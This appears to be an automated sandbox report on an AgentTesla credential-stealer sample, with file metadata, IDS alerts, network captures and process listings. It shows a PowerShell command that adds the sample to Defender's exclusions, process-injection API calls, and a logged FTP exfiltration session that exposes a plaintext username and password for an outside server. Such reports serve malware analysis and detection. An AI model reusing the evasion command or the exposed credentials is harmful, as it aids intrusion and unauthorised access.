                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):7.526024456744009
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Windows Screen Saver (13104/52) 0.07%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  File name:hesaphareket.exe
                                                  File size:979'456 bytes
                                                  MD5:f698edb1fcf31bb642bc2e18b3f05813
                                                  SHA1:b73dbfbedbe4bc7fad70def31c2bf94ec18ff992
                                                  SHA256:5618efb4038198984ccca27de0dd5850a697038d9f0c2a9ad26b17bb26cc0f7b
                                                  SHA512:1c5dac5b9ece2316e08ca770f918298be6da37ee2f44b076ae50c3f694b659fde9384077c0f39d598074936db93c068a9a3b66600e83acbaa4a8c8b6befaf30c
                                                  SSDEEP:24576:U5Orr6zCDzxWGXyFML1yUWf5ObxB7hPAycTy8s:AzC5WGXmMByUWf5q1Ayc
                                                  TLSH:0425AF20B7F8DE67E27AA0F3DB84421197B6D545767FE3AA0CC564CE26C27211383927
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.>g..............0......(........... ........@.. .......................`............@................................
                                                  Icon Hash:130b253d1931012d
                                                  Entrypoint:0x4ee68e
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x673EA430 [Thu Nov 21 03:08:32 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  Name | Virtual Address | Virtual Size | Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0xee63c | 0x4f | .text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf0000 | 0x2588 | .rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xf4000 | 0xc | .reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                  Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                  .text | 0x2000 | 0xec694 | 0xec800 | 98c245d3d52a549ffa0331c0323970e0 | False | 0.7366037509910148 | data | 7.528109321327333 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rsrc | 0xf0000 | 0x2588 | 0x2600 | a012ba9422712b865f10d31fd7c6d07b | False | 0.8751027960526315 | data | 7.576677953691508 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc | 0xf4000 | 0xc | 0x200 | 73ac84c571b6d713397d5c7cbdd7ecf6 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                  Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                  RT_ICON | 0xf0100 | 0x2016 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9504504504504504
                                                  RT_GROUP_ICON | 0xf2128 | 0x14 | data | | | 1.05
                                                  RT_VERSION | 0xf214c | 0x23c | data | | | 0.46678321678321677
                                                  RT_MANIFEST | 0xf2398 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                                                  DLL | Import
                                                  mscoree.dll | _CorExeMain
                                                  Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                  2024-11-24T08:22:44.191583+0100 | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 1 | 192.168.2.11 | 49712 | 104.247.165.99 | 21 | TCP
                                                  2024-11-24T08:22:45.338474+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.11 | 49724 | 104.247.165.99 | 57378 | TCP
                                                  2024-11-24T08:22:45.459003+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.11 | 49724 | 104.247.165.99 | 57378 | TCP
                                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                  Nov 24, 2024 08:22:39.977790117 CET | 49712 | 21 | 192.168.2.11 | 104.247.165.99
                                                  Nov 24, 2024 08:22:40.097394943 CET | 21 | 49712 | 104.247.165.99 | 192.168.2.11
                                                  Nov 24, 2024 08:22:40.097515106 CET | 49712 | 21 | 192.168.2.11 | 104.247.165.99
                                                  Nov 24, 2024 08:22:41.348992109 CET | 21 | 49712 | 104.247.165.99 | 192.168.2.11
                                                  Nov 24, 2024 08:22:41.349318027 CET | 49712 | 21 | 192.168.2.11 | 104.247.165.99
                                                  Nov 24, 2024 08:22:41.468837976 CET | 21 | 49712 | 104.247.165.99 | 192.168.2.11
                                                  Nov 24, 2024 08:22:41.822871923 CET | 21 | 49712 | 104.247.165.99 | 192.168.2.11
                                                  Nov 24, 2024 08:22:41.823096037 CET | 49712 | 21 | 192.168.2.11 | 104.247.165.99
                                                  Nov 24, 2024 08:22:41.942532063 CET | 21 | 49712 | 104.247.165.99 | 192.168.2.11
                                                  Nov 24, 2024 08:22:42.306622028 CET | 21 | 49712 | 104.247.165.99 | 192.168.2.11
                                                  Nov 24, 2024 08:22:42.307049990 CET | 49712 | 21 | 192.168.2.11 | 104.247.165.99
                                                  Nov 24, 2024 08:22:42.427345037 CET | 21 | 49712 | 104.247.165.99 | 192.168.2.11
                                                  Nov 24, 2024 08:22:42.747381926 CET | 21 | 49712 | 104.247.165.99 | 192.168.2.11
                                                  Nov 24, 2024 08:22:42.747612000 CET | 49712 | 21 | 192.168.2.11 | 104.247.165.99
                                                  Nov 24, 2024 08:22:42.867136955 CET | 21 | 49712 | 104.247.165.99 | 192.168.2.11
                                                  Nov 24, 2024 08:22:43.186978102 CET | 21 | 49712 | 104.247.165.99 | 192.168.2.11
                                                  Nov 24, 2024 08:22:43.187452078 CET | 49712 | 21 | 192.168.2.11 | 104.247.165.99
                                                  Nov 24, 2024 08:22:43.306967020 CET | 21 | 49712 | 104.247.165.99 | 192.168.2.11
                                                  Nov 24, 2024 08:22:43.627151012 CET | 21 | 49712 | 104.247.165.99 | 192.168.2.11
                                                  Nov 24, 2024 08:22:43.627379894 CET | 49712 | 21 | 192.168.2.11 | 104.247.165.99
                                                  Nov 24, 2024 08:22:43.747423887 CET | 21 | 49712 | 104.247.165.99 | 192.168.2.11
                                                  Nov 24, 2024 08:22:44.069817066 CET | 21 | 49712 | 104.247.165.99 | 192.168.2.11
                                                  Nov 24, 2024 08:22:44.070785046 CET | 49724 | 57378 | 192.168.2.11 | 104.247.165.99
                                                  Nov 24, 2024 08:22:44.122653961 CET | 49712 | 21 | 192.168.2.11 | 104.247.165.99
                                                  Nov 24, 2024 08:22:44.190423965 CET | 57378 | 49724 | 104.247.165.99 | 192.168.2.11
                                                  Nov 24, 2024 08:22:44.190902948 CET | 49724 | 57378 | 192.168.2.11 | 104.247.165.99
                                                  Nov 24, 2024 08:22:44.191582918 CET | 49712 | 21 | 192.168.2.11 | 104.247.165.99
                                                  Nov 24, 2024 08:22:44.311094999 CET | 21 | 49712 | 104.247.165.99 | 192.168.2.11
                                                  Nov 24, 2024 08:22:45.337331057 CET | 21 | 49712 | 104.247.165.99 | 192.168.2.11
                                                  Nov 24, 2024 08:22:45.338474035 CET | 49724 | 57378 | 192.168.2.11 | 104.247.165.99
                                                  Nov 24, 2024 08:22:45.338548899 CET | 49724 | 57378 | 192.168.2.11 | 104.247.165.99
                                                  Nov 24, 2024 08:22:45.388262987 CET | 49712 | 21 | 192.168.2.11 | 104.247.165.99
                                                  Nov 24, 2024 08:22:45.458626986 CET | 57378 | 49724 | 104.247.165.99 | 192.168.2.11
                                                  Nov 24, 2024 08:22:45.458951950 CET | 57378 | 49724 | 104.247.165.99 | 192.168.2.11
                                                  Nov 24, 2024 08:22:45.459002972 CET | 49724 | 57378 | 192.168.2.11 | 104.247.165.99
                                                  Nov 24, 2024 08:22:45.779582024 CET | 21 | 49712 | 104.247.165.99 | 192.168.2.11
                                                  Nov 24, 2024 08:22:45.825776100 CET | 49712 | 21 | 192.168.2.11 | 104.247.165.99
                                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                  Nov 24, 2024 08:22:39.209144115 CET | 53290 | 53 | 192.168.2.11 | 1.1.1.1
                                                  Nov 24, 2024 08:22:39.966885090 CET | 53 | 53290 | 1.1.1.1 | 192.168.2.11
                                                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                  Nov 24, 2024 08:22:39.209144115 CET | 192.168.2.11 | 1.1.1.1 | 0x3bda | Standard query (0) | ftp.normagroup.com.tr | A (IP address) | IN (0x0001) | false
                                                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                  Nov 24, 2024 08:22:39.966885090 CET | 1.1.1.1 | 192.168.2.11 | 0x3bda | No error (0) | ftp.normagroup.com.tr | | 104.247.165.99 | A (IP address) | IN (0x0001) | false
                                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                                                  Nov 24, 2024 08:22:41.348992109 CET | 21 | 49712 | 104.247.165.99 | 192.168.2.11 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                  | | | | | 220-You are user number 1 of 50 allowed.
                                                  | | | | | 220-Local time is now 10:22. Server port: 21.
                                                  | | | | | 220-This is a private system - No anonymous login
                                                  | | | | | 220-IPv6 connections are also welcome on this server.
                                                  | | | | | 220 You will be disconnected after 15 minutes of inactivity.
                                                  Nov 24, 2024 08:22:41.349318027 CET | 49712 | 21 | 192.168.2.11 | 104.247.165.99 | USER admins@normagroup.com.tr
                                                  Nov 24, 2024 08:22:41.822871923 CET | 21 | 49712 | 104.247.165.99 | 192.168.2.11 | 331 User admins@normagroup.com.tr OK. Password required
                                                  Nov 24, 2024 08:22:41.823096037 CET | 49712 | 21 | 192.168.2.11 | 104.247.165.99 | PASS ab+LNvim5PAo
                                                  Nov 24, 2024 08:22:42.306622028 CET | 21 | 49712 | 104.247.165.99 | 192.168.2.11 | 230 OK. Current restricted directory is /
                                                  Nov 24, 2024 08:22:42.747381926 CET | 21 | 49712 | 104.247.165.99 | 192.168.2.11 | 504 Unknown command
                                                  Nov 24, 2024 08:22:42.747612000 CET | 49712 | 21 | 192.168.2.11 | 104.247.165.99 | PWD
                                                  Nov 24, 2024 08:22:43.186978102 CET | 21 | 49712 | 104.247.165.99 | 192.168.2.11 | 257 "/" is your current location
                                                  Nov 24, 2024 08:22:43.187452078 CET | 49712 | 21 | 192.168.2.11 | 104.247.165.99 | TYPE I
                                                  Nov 24, 2024 08:22:43.627151012 CET | 21 | 49712 | 104.247.165.99 | 192.168.2.11 | 200 TYPE is now 8-bit binary
                                                  Nov 24, 2024 08:22:43.627379894 CET | 49712 | 21 | 192.168.2.11 | 104.247.165.99 | PASV
                                                  Nov 24, 2024 08:22:44.069817066 CET | 21 | 49712 | 104.247.165.99 | 192.168.2.11 | 227 Entering Passive Mode (104,247,165,99,224,34)
                                                  Nov 24, 2024 08:22:44.191582918 CET | 49712 | 21 | 192.168.2.11 | 104.247.165.99 | STOR PW_user-405464_2024_11_24_02_22_38.html
                                                  Nov 24, 2024 08:22:45.337331057 CET | 21 | 49712 | 104.247.165.99 | 192.168.2.11 | 150 Accepted data connection
                                                  Nov 24, 2024 08:22:45.779582024 CET | 21 | 49712 | 104.247.165.99 | 192.168.2.11 | 226-File successfully transferred
                                                  | | | | | 226 0.442 seconds (measured here), 0.70 Kbytes per second

                                                  Target ID:0
                                                  Start time:02:22:34
                                                  Start date:24/11/2024
                                                  Path:C:\Users\user\Desktop\hesaphareket.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\hesaphareket.exe"
                                                  Imagebase:0x210000
                                                  File size:979'456 bytes
                                                  MD5 hash:F698EDB1FCF31BB642BC2E18B3F05813
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1333405214.00000000035D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1333405214.00000000035D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:3
                                                  Start time:02:22:35
                                                  Start date:24/11/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareket.exe"
                                                  Imagebase:0x290000
                                                  File size:433'152 bytes
                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:4
                                                  Start time:02:22:35
                                                  Start date:24/11/2024
                                                  Path:C:\Users\user\Desktop\hesaphareket.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\hesaphareket.exe"
                                                  Imagebase:0x3e0000
                                                  File size:979'456 bytes
                                                  MD5 hash:F698EDB1FCF31BB642BC2E18B3F05813
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:5
                                                  Start time:02:22:35
                                                  Start date:24/11/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff68cce0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:6
                                                  Start time:02:22:35
                                                  Start date:24/11/2024
                                                  Path:C:\Users\user\Desktop\hesaphareket.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\hesaphareket.exe"
                                                  Imagebase:0x7ff68cce0000
                                                  File size:979'456 bytes
                                                  MD5 hash:F698EDB1FCF31BB642BC2E18B3F05813
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:7
                                                  Start time:02:22:36
                                                  Start date:24/11/2024
                                                  Path:C:\Users\user\Desktop\hesaphareket.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\hesaphareket.exe"
                                                  Imagebase:0x910000
                                                  File size:979'456 bytes
                                                  MD5 hash:F698EDB1FCF31BB642BC2E18B3F05813
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.3772427480.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.3771073304.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.3771073304.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.3772427480.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.3772427480.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:false

                                                  Target ID:8
                                                  Start time:02:22:38
                                                  Start date:24/11/2024
                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                  Imagebase:0x7ff6220e0000
                                                  File size:496'640 bytes
                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                  Has elevated privileges:true
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true


                                                    Execution Graph

                                                    Execution Coverage:10.5%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:7.5%
                                                    Total number of Nodes:173
                                                    Total number of Limit Nodes:10
                                                    execution_graph: node and edge dump omitted; Win32 APIs referenced by graph nodes: DuplicateHandle, GetModuleHandleW, GetCurrentProcess, GetCurrentThread, GetCurrentThreadId, CreateProcessA, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, Wow64SetThreadContext, ResumeThread, PostMessageW, CreateActCtxA

                                                    Control-flow Graph

                                                    control_flow_graph: function at 6d5b2b8 (node and edge dump omitted)
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: +L$ +L$ +L$ +L
                                                    • API String ID: 0-1917170596
                                                    • Opcode ID: 0bbe67a2442686374a335fe0f6218ce11cf5cae99cec7b5d10ae85793c4859a4
                                                    • Instruction ID: 130c102b796a643cf8e4cff1e52eb286ec60bf674b6c7f6cb24d4a2c4e7f9f13
                                                    • Opcode Fuzzy Hash: 0bbe67a2442686374a335fe0f6218ce11cf5cae99cec7b5d10ae85793c4859a4
                                                    • Instruction Fuzzy Hash: 6EE1DD30B017048FDBAADB75C460BAEBBF6EF89300F1544AEE945AB691CB35D805CB51
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d571b4bf2b9e8660c1735f8538caed6714ec5a3ba51139ff904cccd6244578b5
                                                    • Instruction ID: 03b9274e114f8697536b376572c22982cc11f956ef0a9e61bbce7e2cb84af1fc
                                                    • Opcode Fuzzy Hash: d571b4bf2b9e8660c1735f8538caed6714ec5a3ba51139ff904cccd6244578b5
                                                    • Instruction Fuzzy Hash: B131D4B1D056588BEB58CF6BC91539AFAB2AFC9300F04C1AA8818AA264DB740946CF40
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6e3c7a8ede9797d525f49145f2e32e9b2afe96ca54b8b0d8e42eff8d2ca0c357
                                                    • Instruction ID: b1b92a77c908155bf7d6d881887cf8053260a075a090fd5c883ca082083f2d29
                                                    • Opcode Fuzzy Hash: 6e3c7a8ede9797d525f49145f2e32e9b2afe96ca54b8b0d8e42eff8d2ca0c357
                                                    • Instruction Fuzzy Hash: 55210934809268CFDFA4CF14D954BF8B7B8AB49311F06A1DA884EA76A1C7348A85CF40
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cb41b23c7ab9000a1ebc46669d55f79c359ab42e8a8a48ca068a29d260d443d5
                                                    • Instruction ID: 7d88d7f083ad409eadb10961c5d8c3fc72a0369c2832e514bc6b33c6cb6440f2
                                                    • Opcode Fuzzy Hash: cb41b23c7ab9000a1ebc46669d55f79c359ab42e8a8a48ca068a29d260d443d5
                                                    • Instruction Fuzzy Hash: 6921D6B1D156189BEB58CFA7D8447DEBEF6AFC8300F14C06AD4087A664DB740A4A8F90
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c043510b12c04fb0cf0c7a2df978a2e280837091bfa1b70e256cf58da5743fe1
                                                    • Instruction ID: bf0e734cdfae668ecd9e4531eec6ab8dbcb0a504d02b85ff204aa83a2978259a
                                                    • Opcode Fuzzy Hash: c043510b12c04fb0cf0c7a2df978a2e280837091bfa1b70e256cf58da5743fe1
                                                    • Instruction Fuzzy Hash: B411FC34809268CFDFA0DF54D9947F8B7B4EB4A311F026196D84EA6661D7348E85CF40
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 31f458c5bac8998e4b4c49abe85324829304f57659ba457da2484738d7a08832
                                                    • Instruction ID: d24be3be7c6c169aa33d33cc1d43d827127159fb52dc76e3ed64672fa33c44f1
                                                    • Opcode Fuzzy Hash: 31f458c5bac8998e4b4c49abe85324829304f57659ba457da2484738d7a08832
                                                    • Instruction Fuzzy Hash: BB11BEB2E056189BEB58CF6BCC0139EFAF7ABC9300F09D076C918A6654EB3445468E55

                                                    Control-flow Graph

                                                    control_flow_graph: function at b5cf90 (node and edge dump omitted)
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 00B5D01E
                                                    • GetCurrentThread.KERNEL32 ref: 00B5D05B
                                                    • GetCurrentProcess.KERNEL32 ref: 00B5D098
                                                    • GetCurrentThreadId.KERNEL32 ref: 00B5D0F1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1331372448.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_b50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: fe2ca2c33fa441ff58f3c154ba38df2eabcebaa6d2c9c6fbf1fee3f0d03c7f4c
                                                    • Instruction ID: 9b7e70496138edbea239215cddaf71262b22162bd323addd47d739e51bc0b67c
